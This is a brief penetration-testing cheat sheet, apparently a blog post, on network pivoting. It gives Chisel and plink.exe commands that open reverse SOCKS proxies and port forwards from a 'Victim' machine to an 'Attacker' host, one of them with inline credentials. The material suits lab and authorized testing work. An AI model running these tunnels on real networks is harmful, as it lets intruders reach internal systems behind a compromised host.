Técnicas de Pivoting

https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding

https://michmich.eu/Cheatsheets/internal/07-pivoting/

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md

Chisel

You can download it from the releases page of https://github.com/jpillora/chisel You need to use the same version for client and server

socks

./chisel server -p 8080 –reverse #Server — Attacker

./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client — Victim

#And now you can use proxychains with port 1080 (default)

./chisel server -v -p 8080 –socks5 #Server — Victim (needs to have port 8080 exposed)

./chisel client -v 10.10.10.10:8080 socks #Attacker

Port forwarding

./chisel_1.7.6_linux_amd64 server -p 12312 –reverse #Server — Attacker

./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client — Victim

Plink.exe

It’s like a console PuTTY version ( the options are very similar to an ssh client).

As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine:

echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>

echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090

Comments are closed.